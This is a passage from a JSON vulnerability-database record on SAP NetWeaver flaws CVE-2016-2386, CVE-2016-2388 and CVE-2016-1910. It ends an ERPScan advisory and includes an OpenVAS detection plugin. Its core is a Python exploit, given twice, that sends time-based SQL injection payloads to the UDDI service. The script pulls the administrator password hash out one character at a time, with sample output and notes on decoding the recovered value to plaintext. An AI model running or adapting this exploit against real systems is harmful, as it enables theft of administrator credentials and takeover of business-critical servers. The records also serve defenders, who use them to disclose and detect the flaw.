conduct the best SAP security \nresearch. \n \n \n \n11. ABOUT ERPScan \n \nERPScan is the most respected and credible Business Application \nSecurity provider. Founded in 2010, the company operates globally and \nenables large Oil and Gas, Financial and Retail organizations to \nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019 \nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and \ndistinguished by 30+ other awards, ERPScan is the leading SAP SE \npartner in discovering and resolving security vulnerabilities. ERPScan \nconsultants work with SAP SE in Walldorf to assist in improving the \nsecurity of their latest solutions. \n \nERPScan\u2019s primary mission is to close the gap between technical and \nbusiness security, and provide solutions to evaluate and secure SAP \nand Oracle ERP systems and business-critical applications from both, \ncyber-attacks as well as internal fraud. Usually our clients are large \nenterprises, Fortune 2000 companies and managed service providers \nwhose requirements are to actively monitor and manage security of vast \nSAP landscapes on a global scale. \n \nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto \nand Amsterdam to provide threat intelligence services, agile support \nand operate local offices and partner network spanning 20+ countries \naround the globe. \n \n \n \nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 \n \nPhone: 650.798.5255 \n \nTwitter: @erpscan \n \nScoop-it: Business Application Security \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137129/ERPSCAN-16-011.txt"}, {"lastseen": "2018-01-12T08:25:29", "description": "", "published": "2018-01-12T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver J2EE Engine 7.40 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-12T00:00:00", "id": "PACKETSTORM:145860", "href": "https://packetstormsecurity.com/files/145860/SAP-NetWeaver-J2EE-Engine-7.40-SQL-Injection.html", "sourceData": "`#!/usr/bin/env python \n# coding=utf-8 \n\"\"\" \nAuthor: Vahagn Vardanyan https://twitter.com/vah_13 \n \nBugs: \nCVE-2016-2386 SQL injection \nCVE-2016-2388 Information disclosure \nCVE-2016-1910 Crypto issue \n \n \n \nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50 \n \nPOST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 \nSOAPAction: \nContent-Type: text/xml;charset=UTF-8 \nHost: nw74:50000 \nContent-Length: 500 \n \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\"> \n<soapenv:Header/> \n<soapenv:Body> \n<sec:deletePermissionById> \n<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId> \n</sec:deletePermissionById> \n</soapenv:Body> \n</soapenv:Envelope> \n \n \n \n \nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload \n \n%PRIVATE_DATASOURCE.un:Administrator% \n \nmost SAP's using j2ee_admin username for SAP administrator login \n \n%PRIVATE_DATASOURCE.un:j2ee_admin% \n \nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure) \n \n1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat# \n2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages# \n \nInstead of J2EE_CONFIGENTRY table you can use this tables \n \nUME_STRINGS_PERM \nUME_STRINGS_ACTN \nBC_DDDBDP \nBC_COMPVERS \nTC_WDRR_MRO_LUT \nTC_WDRR_MRO_FILES \nT_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection \nT_DOMAIN \nT_SESSION \nUME_ACL_SUP_PERM \nUME_ACL_PERM \nUME_ACL_PERM_MEM \n \n \nAn example of a working exploit \n \nC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000 \nstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit \nthis may take a few minutes \nFound {SHA-512, 10000, 24}M \nFound {SHA-512, 10000, 24}MT \nFound {SHA-512, 10000, 24}MTI \nFound {SHA-512, 10000, 24}MTIz \nFound {SHA-512, 10000, 24}MTIzU \nFound {SHA-512, 10000, 24}MTIzUV \nFound {SHA-512, 10000, 24}MTIzUVd \nFound {SHA-512, 10000, 24}MTIzUVdF \nFound {SHA-512, 10000, 24}MTIzUVdFY \nFound {SHA-512, 10000, 24}MTIzUVdFYX \nFound {SHA-512, 10000, 24}MTIzUVdFYXN \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk8 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6 \nFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X \n \n \nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text \n \nbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdA3AqA1AAoX \n \n\"\"\" \nimport argparse \nimport requests \nimport string \n \n_magic = \"{SHA-512, 10000, 24}\" \n_wrong_magic = \"{SHA-511, 10000, 24}\" \n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\ \n\"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\ \n\"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\ \n\"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\ \n\"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \" \nhost = \"\" \nport = 0 \n_dictionary = string.digits + string.uppercase + string.lowercase \n \ndef _get_timeout(_data): \nreturn requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port), \nheaders={ \n\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \" \n\"Firefox/57.0\", \n\"SOAPAction\": \"\", \n\"Content-Type\": \"text/xml;charset=UTF-8\" \n}, \ndata=_xml.format(_data)).elapsed.total_seconds() \n \n \nif __name__ == \"__main__\": \nparser = argparse.ArgumentParser() \nparser.add_argument('--host') \nparser.add_argument('--port') \nparser.add_argument('-v') \n \nargs = parser.parse_args() \nargs_dict = vars(args) \n \nhost = args_dict['host'] \nport = args_dict['port'] \n \nprint \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host) \n_hash = _magic \nprint \"this may take a few minutes\" \nfor i in range(24): # you can change it if like to get full hash \nfor _char in _dictionary: \nif not (args_dict['v'] is None): \nprint \"checking {0}\".format(_hash + _char) \nif _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server \n_hash += _char \nprint \"Found \" + _hash \nbreak \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/145860/sapnetweaverj2eeengine740-sql.txt"}], "openvas": [{"lastseen": "2020-05-12T17:21:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2386", "CVE-2016-2388"], "description": "SAP NetWeaver is prone to multiple vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2016-05-23T00:00:00", "id": "OPENVAS:1361412562310106083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106083", "type": "openvas", "title": "SAP NetWeaver Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SAP NetWeaver Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:sap:netweaver';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106083\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-23 10:42:10 +0700 (Mon, 23 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-2386\", \"CVE-2016-2388\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"SAP NetWeaver Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_sap_netweaver_detect.nasl\");\n script_mandatory_keys(\"sap_netweaver/installed\");\n\n script_tag(name:\"summary\", value:\"SAP NetWeaver is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"SQL injection vulnerability in the UDDI server (CVE-2016-2386).\n The Universal Worklist Configuration in SAP NetWeaver 7.4 allows remote attackers to obtain sensitive\n user information via a crafted HTTP request (CVE-2016-2388).\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may execute arbitrary SQL commands or obtain\n sensitive user information via a crafted HTTP request.\");\n\n script_tag(name:\"affected\", value:\"Version 7.1 until 7.5\");\n\n script_tag(name:\"solution\", value:\"Check the references for solutions.\");\n\n script_xref(name:\"URL\", value:\"https://service.sap.com/sap/support/notes/2101079\");\n script_xref(name:\"URL\", value:\"https://service.sap.com/sap/support/notes/2256846\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/43495/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nurl = '/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat';\n\n# NetWeaver seems sometimes to check the 'User-Agent'\nreq = http_get_req(port: port, url: url, user_agent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110420 Firefox/3.5.19');\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Add Participant\" >< res && \"<title>Instant Messaging</title>\" >< res) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver J2EE Engine 7.40 - SQL Injection", "edition": 1, "published": "2018-01-10T00:00:00", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-10T00:00:00", "id": "EXPLOITPACK:65C2E64117E8F5912C9ABA1DC61429AE", "href": "", "sourceData": "#!/usr/bin/env python\n# coding=utf-8\n\"\"\"\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\n\nBugs:\nCVE-2016-2386 SQL injection\nCVE-2016-2388 Information disclosure\nCVE-2016-1910 Crypto issue\n\n\n\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\n \n POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\n\tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\n\tSOAPAction:\n\tContent-Type: text/xml;charset=UTF-8\n\tHost: nw74:50000\n\tContent-Length: 500\n\n\t<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\n\t <soapenv:Header/>\n\t <soapenv:Body>\n\t\t<sec:deletePermissionById>\n\t\t <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\n\t\t</sec:deletePermissionById>\n\t </soapenv:Body>\n\t</soapenv:Envelope>\n \n\n\n\nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload\n\n %PRIVATE_DATASOURCE.un:Administrator%\n\nmost SAP's using j2ee_admin username for SAP administrator login\n\n %PRIVATE_DATASOURCE.un:j2ee_admin%\n\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)\n\n\t1)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\n\t2)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\n\nInstead of J2EE_CONFIGENTRY table you can use this tables\n\n UME_STRINGS_PERM\n UME_STRINGS_ACTN\n BC_DDDBDP\n BC_COMPVERS\n TC_WDRR_MRO_LUT\n TC_WDRR_MRO_FILES\n T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection\n T_DOMAIN\n T_SESSION\n UME_ACL_SUP_PERM\n UME_ACL_PERM\n UME_ACL_PERM_MEM\n\n\nAn example of a working exploit\n\n\tC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\n\tstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\n\tthis may take a few minutes\n\tFound {SHA-512, 10000, 24}M\n\tFound {SHA-512, 10000, 24}MT\n\tFound {SHA-512, 10000, 24}MTI\n\tFound {SHA-512, 10000, 24}MTIz\n\tFound {SHA-512, 10000, 24}MTIzU\n\tFound {SHA-512, 10000, 24}MTIzUV\n\tFound {SHA-512, 10000, 24}MTIzUVd\n\tFound {SHA-512, 10000, 24}MTIzUVdF\n\tFound {SHA-512, 10000, 24}MTIzUVdFY\n\tFound {SHA-512, 10000, 24}MTIzUVdFYX\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXN\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk8\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X\n\n\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\n\n\tbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\n\n\"\"\"\nimport argparse\nimport requests\nimport string\n\n_magic = \"{SHA-512, 10000, 24}\"\n_wrong_magic = \"{SHA-511, 10000, 24}\"\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\n \"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\nhost = \"\"\nport = 0\n_dictionary = string.digits + string.uppercase + string.lowercase\n\ndef _get_timeout(_data):\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\n headers={\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\n \"Firefox/57.0\",\n \"SOAPAction\": \"\",\n \"Content-Type\": \"text/xml;charset=UTF-8\"\n },\n data=_xml.format(_data)).elapsed.total_seconds()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--host')\n parser.add_argument('--port')\n parser.add_argument('-v')\n\n args = parser.parse_args()\n args_dict = vars(args)\n\n host = args_dict['host']\n port = args_dict['port']\n\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\n _hash = _magic\n print \"this may take a few minutes\"\n for i in range(24): # you can change it if like to get full hash\n for _char in _dictionary:\n if not (args_dict['v'] is None):\n print \"checking {0}\".format(_hash + _char)\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\n _hash += _char\n print \"Found \" + _hash\n break", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
